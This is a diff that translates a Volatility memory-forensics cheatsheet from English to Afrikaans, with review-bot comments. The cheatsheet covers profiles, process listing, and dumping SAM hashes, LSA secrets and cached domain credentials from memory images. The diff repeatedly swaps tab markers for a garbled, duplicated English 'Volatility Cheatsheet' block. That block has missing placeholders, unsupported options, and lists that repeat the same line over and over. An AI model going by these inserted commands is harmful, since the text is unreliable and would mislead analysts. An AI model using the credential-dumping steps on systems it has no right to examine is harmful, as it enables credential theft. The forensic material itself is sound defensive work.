@@ -57,26 +82,26 @@ python setup.py install {% endtab %} {% endtabs %} -## Volatility Commands +## Volatility Opdragte -Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan) +Kry toegang tot die amptelike dokumentasie in [Volatility-opdragverwysing](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan) -### A note on “list” vs. “scan” plugins +### 'n Nota oor "lys" vs. "skandering" invoegtoepassings -Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes (locate and walk the linked list of `_EPROCESS` structures in memory), OS handles (locating and listing the handle table, dereferencing any pointers found, etc). They more or less behave like the Windows API would if requested to, for example, list processes. +Volatility het twee hoofbenaderings tot invoegtoepassings, wat soms weerspieël word in hul name. "Lys" invoegtoepassings sal probeer om deur Windows Kernel-strukture te navigeer om inligting soos prosesse op te haal (lokalisering en loop deur die gekoppelde lys van `_EPROCESS` strukture in die geheue), OS-hanteerders (lokalisering en lys van die hanteerdertabel, dereferensie van enige gevonde wysers, ens.). Hulle gedra hulle min of meer soos die Windows API sou doen as dit versoek sou word om byvoorbeeld prosesse te lys. -That makes “list” plugins pretty fast, but just as vulnerable as the Windows API to manipulation by malware. For instance, if malware uses DKOM to unlink a process from the `_EPROCESS` linked list, it won’t show up in the Task Manager and neither will it in the pslist. +Dit maak "lys" invoegtoepassings redelik vinnig, maar net so kwesbaar soos die Windows API vir manipulasie deur kwaadwillige sagteware. 
Byvoorbeeld, as kwaadwillige sagteware DKOM gebruik om 'n proses van die `_EPROCESS` gekoppelde lys af te koppel, sal dit nie in die Taakbestuurder verskyn nie en ook nie in die pslys nie. -“scan” plugins, on the other hand, will take an approach similar to carving the memory for things that might make sense when dereferenced as specific structures. `psscan` for instance will read the memory and try to make`_EPROCESS` objects out of it (it uses pool-tag scanning, which is searching for 4-byte strings that indicate the presence of a structure of interest). The advantage is that it can dig up processes that have exited, and even if malware tampers with the `_EPROCESS` linked list, the plugin will still find the structure lying around in memory (since it still needs to exist for the process to run). The downfall is that “scan” plugins are a bit slower than “list” plugins, and can sometimes yield false positives (a process that exited too long ago and had parts of its structure overwritten by other operations). +"Skandering" invoegtoepassings daarenteen sal 'n benadering volg wat soortgelyk is aan die uitsny van die geheue vir dinge wat sin maak wanneer dit as spesifieke strukture gedereferensieer word. `psscan` sal byvoorbeeld die geheue lees en probeer om `_EPROCESS`-voorwerpe daaruit te maak (dit gebruik pool-tag-skandering, wat soek na 4-byte-reekse wat die teenwoordigheid van 'n belangrike struktuur aandui). Die voordeel is dat dit prosesse kan opgrawe wat beëindig is, en selfs as kwaadwillige sagteware met die `_EPROCESS` gekoppelde lys knoei, sal die invoegtoepassing steeds die struktuur in die geheue vind (aangesien dit steeds moet bestaan vir die proses om te loop). Die nadeel is dat "skandering" invoegtoepassings 'n bietjie stadiger as "lys" invoegtoepassings is, en soms vals positiewe resultate kan lewer ('n proses wat te lank gelede beëindig is en waarvan dele van die struktuur deur ander operasies oorskryf is). 
-From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/) +Bron: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/) -## OS Profiles +## BS-profiel ### Volatility3 -As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\ -Symbol table packs for the various operating systems are available for **download** at: +Soos in die leesmyl verduidelik, moet jy die **simbooltabel van die BS** wat jy wil ondersteun, in _volatility3/volatility/symbols_ plaas.\ +Simbooltabelpakke vir die verskillende bedryfstelsels is beskikbaar vir **aflaai** by: * [https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip) * [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip) 
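Review bot: a plugin identifier has been translated in the "list vs scan" paragraph. The added line renders `pslist` as "pslys" ("... en ook nie in die pslys nie"); `pslist` is a Volatility plugin name and must stay as-is, exactly like `psscan` and `_EPROCESS` in the same paragraph. Two smaller points in the same hunk: `## BS-profiel` should be plural (`## BS-profiele`) to match "OS Profiles", and "leesmyl" is not a word; leave "README" untranslated since it is the file name.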
@@ -84,16 +109,13 @@ Symbol table packs for the various operating systems are available for **downloa ### Volatility2 -#### External Profile - -You can get the list of supported profiles doing: +#### Eksterne profiel +Jy kan die lys van ondersteunde profiele kry deur die volgende te doen: ```bash ./volatility_2.6_lin64_standalone --info | grep "Profile" ``` - -If you want to use a **new profile you have downloaded** (for example a linux one) you need to create somewhere the following folder structure: _plugins/overlays/linux_ and put inside this folder the zip file containing the profile. Then, get the number of the profiles using: - +As jy 'n **nuwe profiel wat jy afgelaai het** wil gebruik (byvoorbeeld 'n Linux-profiel), moet jy die volgende vouerstruktuur êrens skep: _plugins/overlays/linux_ en sit die zip-lêer wat die profiel bevat binne hierdie vouer. Kry dan die nommer van die profiele deur die volgende te gebruik: ```bash ./vol --plugins=/home/kali/Desktop/ctfs/final/plugins --info Volatility Foundation Volatility Framework 2.6 
@@ -105,28 +127,22 @@ LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 - A Profile for Linux CentOS7_3.10 VistaSP0x64 - A Profile for Windows Vista SP0 x64 VistaSP0x86 - A Profile for Windows Vista SP0 x86 ``` +Jy kan **Linux en Mac profiele aflaai** vanaf [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles) -You can **download Linux and Mac profiles** from [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles) - -In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, and you can use it to execute something like: - +In die vorige blok kan jy sien dat die profiel genoem word `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, en jy kan dit gebruik om iets soos die volgende uit te voer: ```bash ./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan ``` - -#### Discover Profile - +#### Ontdek Profiel ``` volatility imageinfo -f file.dmp volatility kdbgscan -f file.dmp ``` +#### **Verskille tussen imageinfo en kdbgscan** -#### **Differences between imageinfo and kdbgscan** - -[**From here**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and the number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it from . - -Always take a look at the **number of processes that kdbgscan has found**. 
Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** (This is because to extract processes the correct KDBG address is needed) +[**Vanaf hier**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): In teenstelling met imageinfo wat slegs profielvoorstelle bied, is **kdbgscan** ontwerp om die korrekte profiel en die korrekte KDBG-adres positief te identifiseer (as daar dalk meer as een is). Hierdie invoegtoepassing skandeer vir die KDBGHeader-handtekeninge wat gekoppel is aan Volatility-profiels en pas sinvolheidskontroles toe om vals positiewe te verminder. Die uitvoer se oorvloedigheid en die aantal sinvolheidskontroles wat uitgevoer kan word, hang af van of Volatility 'n DTB kan vind. As jy reeds die korrekte profiel ken (of as jy 'n profielvoorstel van imageinfo het), moet jy seker maak dat jy dit gebruik. +Neem altyd 'n kykie na die **aantal prosesse wat kdbgscan gevind het**. Soms kan imageinfo en kdbgscan **meer as een geskikte profiel vind**, maar slegs die **geldige een sal enkele prosesse hê** (Dit is omdat die korrekte KDBG-adres nodig is om prosesse te onttrek). ```bash # GOOD PsActiveProcessHead : 0xfffff800011977f0 (37 processes) 
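Review bot: typo in the kdbgscan paragraph: "Volatility-profiels" should be "Volatility-profiele". Note also that the English sentence being translated ends in a truncated "make sure you use it from ." and the Afrikaans silently completes it ("moet jy seker maak dat jy dit gebruik"); either fix the truncation in the English source in the same change or keep the translation faithful so the gap stays visible for a later fix.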
@@ -138,23 +154,20 @@ PsLoadedModuleList : 0xfffff8000119aae0 (116 modules) PsActiveProcessHead : 0xfffff800011947f0 (0 processes) PsLoadedModuleList : 0xfffff80001197ac0 (0 modules) ``` - #### KDBG -The **kernel debugger block**, referred to as **KDBG** by Volatility, is crucial for forensic tasks performed by Volatility and various debuggers. Identified as `KdDebuggerDataBlock` and of the type `_KDDEBUGGER_DATA64`, it contains essential references like `PsActiveProcessHead`. This specific reference points to the head of the process list, enabling the listing of all processes, which is fundamental for thorough memory analysis. - -## OS Information +Die **kernel debugger block**, bekend as **KDBG** deur Volatility, is noodsaaklik vir forensiese take wat deur Volatility en verskeie debuggers uitgevoer word. Dit word geïdentifiseer as `KdDebuggerDataBlock` en is van die tipe `_KDDEBUGGER_DATA64`. Dit bevat essensiële verwysings soos `PsActiveProcessHead`. Hierdie spesifieke verwysing wys na die kop van die proseslys, wat die lys van alle prosesse moontlik maak, wat fundamenteel is vir deeglike geheue-analise. +## Bedryfstelselinligting ```bash #vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info) ./vol.py -f file.dmp windows.info.Info ``` +Die invoegtoepassing `banners.Banners` kan gebruik word in **vol3 om Linux-banners** in die dump te probeer vind. -The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump. +## Hasse/Wagwoorde -## Hashes/Passwords - -Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). 
+Onttrek SAM-hashe, [gekasteerde geloofsbriewe van die domein](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) en [lsa-geheime](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). {% tabs %} {% tab title="vol3" %} 
@@ -163,9 +176,80 @@ Extract SAM hashes, [domain cached credentials](../../../windows-hardening/steal ./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry ./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. 
+ +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=Win7SP1x86_23418 hashdump -f file.dmp #Grab common windows hashes (SAM+SYSTEM) volatility --profile=Win7SP1x86_23418 cachedump -f file.dmp #Grab domain cache hashes inside the registry 
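Review bot: the `{% endtab %}` / `{% tab title="vol2" %}` pair that separates the vol3 and vol2 hash-dump snippets has been replaced by an untranslated, unrelated English "Volatility Cheatsheet" document (Introduction, Installation, Basic Usage, Process Analysis, Network Analysis, File Analysis, Conclusion). As a result the vol2 tab disappears and its `hashdump`/`cachedump`/`lsadump` commands end up inside the vol3 tab, an H1 `# Volatility Cheatsheet` is introduced in the middle of the page, and the inserted text is itself unusable: the command templates have lost their placeholders (`python vol.py -f [options]`, "Replace `` with the path"), the `--ip` and `--port` options it shows for `netscan` appear nowhere else on the page, and `dumpfiles --dump-dir --name <path>` does not match how the vol2 snippets on this page use those switches (`procdump --pid=3152 -n --dump-dir=.`, where `--dump-dir` takes a directory and `-n` is a bare flag). Restore the two deleted tab markers and delete the whole inserted block; nothing in it belongs to a translation change.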
@@ -174,28 +258,24 @@ volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets {% endtab %} {% endtabs %} -## Memory Dump - -The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**. +## Geheue Dump +Die geheue dump van 'n proses sal **alles onttrek** van die huidige status van die proses. Die **procdump** module sal slegs die **kode onttrek**. ``` volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ ``` - -​ -
-​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Processes +## Prosesse -### List processes +### Lys prosesse -Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\ -It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes. +Probeer om **verdagte** prosesse (volgens naam) of **onverwagte** kinderprosesse (byvoorbeeld 'n cmd.exe as 'n kind van iexplorer.exe) te vind.\ +Dit kan interessant wees om die resultaat van pslist te vergelyk met dié van psscan om verborge prosesse te identifiseer. {% tabs %} {% tab title="vol3" %} 
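Review bot: inconsistent terminology between the two translations of the same RootedCON banner. The copy earlier in this file says "kuberveiligheidsevenement" and "kuberveiligheidspesialiste", this hunk says "sibersekuriteitsgebeurtenis" and "sibersekuriteitsprofessionals"; the banner is a repeated fixed block, so pick one rendering and use it for both occurrences. Minor: `## Geheue Dump` could follow the hyphenated form used elsewhere in the translation ("geheue-dump").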
@@ -204,9 +284,80 @@ python3 vol.py -f file.dmp windows.pstree.PsTree # Get processes tree (not hidde python3 vol.py -f file.dmp windows.pslist.PsList # Get process list (EPROCESS) python3 vol.py -f file.dmp windows.psscan.PsScan # Get hidden process list(malware) ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. 
+ +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=PROFILE pstree -f file.dmp # Get process tree (not hidden) volatility --profile=PROFILE pslist -f file.dmp # Get process list (EPROCESS) 
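Review bot: same problem as in the hash-dump section: the `{% endtab %}` and `{% tab title="vol2" %}` markers between the vol3 and vol2 process-listing snippets are replaced by a verbatim second copy of the English "Volatility Cheatsheet" block, so the vol2 `pstree`/`pslist`/`psxview` commands land inside the vol3 tab and a second `# Volatility Cheatsheet` H1 appears. With the markers gone, the `{% endtab %}` `{% endtabs %}` at line 216 closes the vol3 tab around both snippets, which is not the intent. Restore the two markers and delete the block.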
@@ -216,34 +367,135 @@ volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list {% endtab %} {% endtabs %} -### Dump proc +### Stortingsproses {% tabs %} {% tab title="vol3" %} ```bash ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their associated information, such as process ID, parent process ID, and command line arguments. 
+ +``` +python vol.py -f pslist +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, including local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles and file names. + +``` +python vol.py -f filescan +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. By using the commands and techniques outlined in this cheatsheet, you can perform a wide range of memory analysis tasks and gain insights into various types of incidents. ```bash volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f file.dmp ``` {% endtab %} {% endtabs %} -### Command line +### Opdraglyn -Anything suspicious was executed? - -{% tabs %} -{% tab title="vol3" %} +Is daar enige iets verdagtes uitgevoer? ```bash python3 vol.py -f file.dmp windows.cmdline.CmdLine #Display process command-line arguments ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. 
Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their associated information, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, including local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles and file names. + +``` +python vol.py -f filescan +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. By using the commands and techniques outlined in this cheatsheet, you can perform a wide range of memory analysis tasks and gain insights into various types of incidents. ```bash volatility --profile=PROFILE cmdline -f file.dmp #Display process command-line arguments volatility --profile=PROFILE consoles -f file.dmp #command history by scanning for _CONSOLE_INFORMATION 
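Review bot: this hunk breaks tab nesting twice. In "Dump proc" (translated as "Stortingsproses", which reads as "deposit process"; "Dump proses" or "Stort proses" would be clearer) the `{% endtab %}` / `{% tab title="vol2" %}` pair is again replaced with the English cheatsheet block. In "Command line" the opening `{% tabs %}` and `{% tab title="vol3" %}` are deleted and the separator is replaced by the same block, yet the `{% endtab %}` and `{% endtabs %}` at the start of the next hunk's context (line 251) are kept, so they now close tabs that were never opened. Both inserted copies carry the same stripped placeholders ("Replace `` with the path"). Restore all four markers and drop both inserted copies.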
@@ -251,44 +503,163 @@ volatility --profile=PROFILE consoles -f file.dmp #command history by scanning f {% endtab %} {% endtabs %} -Commands executed in `cmd.exe` are managed by **`conhost.exe`** (or `csrss.exe` on systems before Windows 7). This means that if **`cmd.exe`** is terminated by an attacker before a memory dump is obtained, it's still possible to recover the session's command history from the memory of **`conhost.exe`**. To do this, if unusual activity is detected within the console's modules, the memory of the associated **`conhost.exe`** process should be dumped. Then, by searching for **strings** within this dump, command lines used in the session can potentially be extracted. +Opdragte wat in `cmd.exe` uitgevoer word, word bestuur deur **`conhost.exe`** (of `csrss.exe` op stelsels voor Windows 7). Dit beteken dat as **`cmd.exe`** deur 'n aanvaller beëindig word voordat 'n geheue-dump verkry word, dit steeds moontlik is om die opdraggeskiedenis van die sessie te herstel uit die geheue van **`conhost.exe`**. Om dit te doen, as ongewone aktiwiteit binne die modules van die konsole opgespoor word, moet die geheue van die betrokke **`conhost.exe`**-proses gedump word. Dan kan deur te soek na **strings** binne hierdie dump, moontlik opdraglyne wat in die sessie gebruik is, onttrek word. -### Environment +### Omgewing -Get the env variables of each running process. There could be some interesting values. - -{% tabs %} -{% tab title="vol3" %} +Kry die omgewingsveranderlikes van elke lopende proses. Daar kan interessante waardes wees. ```bash python3 vol.py -f file.dmp windows.envars.Envars [--pid ] #Display process environment variables ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. 
+- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. 
+- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. + +## Volatility Profiele + +Hierdie is 'n lys van algemene profiele wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003R2SP0x86`: Windows 2003 R2 SP0 x86 +- `Win2003R2SP1x86`: Windows 2003 R2 SP1 x86 +- `Win2003R2SP2x86`: Windows 2003 R2 SP2 x86 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008R2SP0x86`: Windows 2008 R2 SP0 x86 +- `Win2008R2SP1x86`: Windows 2008 R2 SP1 x86 +- `Win2012SP0x86`: Windows 2012 SP0 x86 +- `Win2012SP1x86`: Windows 2012 SP1 x86 +- `Win2012R2SP0x86`: Windows 2012 R2 SP0 x86 +- `Win2012R2SP1x86`: Windows 2012 R2 SP1 x86 +- `Win2016SP0x86`: Windows 2016 SP0 x86 +- `Win2016SP1x86`: Windows 2016 SP1 x86 +- `Win2019SP0x86`: Windows 2019 SP0 x86 +- `Win2019SP1x86`: Windows 2019 SP1 x86 + +## Bronne + +- [Volatility Framework](https://www.volatilityfoundation.org/) +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) ```bash volatility --profile=PROFILE envars -f file.dmp [--pid ] #Display process environment variables -volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated +volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated ``` {% endtab %} {% endtabs %} -### Token privileges +### Token voorregte -Check for privileges tokens in unexpected services.\ -It could be interesting to list the processes using some privileged token. 
- -{% tabs %} -{% tab title="vol3" %} +Kyk vir voorregte tokens in onverwagte dienste.\ +Dit kan interessant wees om die prosesse te lys wat van sommige voorregte tokens gebruik maak. ```bash #Get enabled privileges of some processes python3 vol.py -f file.dmp windows.privileges.Privs [--pid ] #Get all processes with interesting privileges python3 vol.py -f file.dmp windows.privileges.Privs | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege" ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin 